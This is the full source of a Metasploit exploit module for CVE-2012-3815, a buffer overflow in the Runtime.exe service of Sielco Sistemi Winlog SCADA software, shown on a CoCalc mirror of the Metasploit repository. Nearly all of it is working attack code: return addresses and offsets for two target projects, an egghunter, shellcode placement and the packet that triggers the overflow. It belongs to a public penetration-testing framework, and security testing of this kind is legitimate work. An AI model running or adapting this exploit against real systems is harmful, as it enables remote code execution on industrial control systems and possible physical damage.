Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/winlog_runtime_2.rb
19850 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Egghunter

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16',

17
        'Description' => %q{

18
          This module exploits a buffer overflow in Sielco Sistem Winlog <= 2.07.16.

19
          When sending a specially formatted packet to the Runtime.exe service on port 46824,

20
          an attacker may be able to execute arbitrary code.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => [

24
          'Michael Messner <devnull[at]s3cur1ty.de>'

25
        ],

26
        'References' => [

27
          [ 'BID', '53811'],

28
          [ 'CVE', '2012-3815'],

29
          [ 'OSVDB', '82654'],

30
          [ 'EDB', '18986'],

31
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2012-001' ],

32
          [ 'URL', 'http://www.sielcosistemi.com/en/download/public/winlog_lite.html' ]

33
        ],

34
        'DefaultOptions' => {

35
          'EXITFUNC' => 'thread',

36
        },

37
        'Platform' => 'win',

38
        'Payload' => {

39
          'Space' => 2000,

40
          'BadChars' => "\x00",

41
          'DisableNops' => true,

42
        },

43
        'Targets' => [

44
          [

45
            'Sielco Sistemi Winlog 2.07.14/2.07.16 - Ceramics Kiln Project',

46
            {

47
              'Ret' => 0x405153df,

48
              'Offset' => 167,

49
            }

50
          ], #  Jmp ESP - Vclx40.bpl - 0x405153df

51
          [

52
            'Sielco Sistemi Winlog 2.07.14 - Automatic Washing System Project',

53
            {

54
              'Ret' => 0x405153df,

55
              'Offset' => 151,

56
            }

57
          ], #  Jmp ESP - Vclx40.bpl - 0x405153df

58
          # The reliability depends on the actual project. We need to generate some more

59
          # targets. Two of them for the default project and one other project is now available.

60
        ],

61
        'Privileged' => false,

62
        'DisclosureDate' => '2012-06-04',

63
        'DefaultTarget' => 0,

64
        'Notes' => {

65
          'Reliability' => UNKNOWN_RELIABILITY,

66
          'Stability' => UNKNOWN_STABILITY,

67
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

68
        }

69
      )

70
    )

71


72
    register_options([Opt::RPORT(46824)])

73
  end

74


75
  def exploit

76
    connect

77


78
    egghunter, egg = generate_egghunter(payload.encoded, payload_badchars)

79


80
    print_status("Placing the shellcode")

81
    shellcode = rand_text_alpha(2000)

82
    shellcode << egg

83
    sock.put(shellcode)

84


85
    select(nil, nil, nil, 1)

86


87
    buffer = rand_text_alpha(20)

88
    buffer << "\x14" * 10	# trigger the crash

89
    buffer << rand_text_alpha(target['Offset'])

90
    buffer << [target.ret].pack('V')

91
    buffer << egghunter

92
    buffer << rand_text_alpha(69 - egghunter.length)

93


94
    print_status("Trying target #{target.name}...")

95
    sock.put(buffer)

96


97
    handler

98
    disconnect

99
  end

100
end

101


102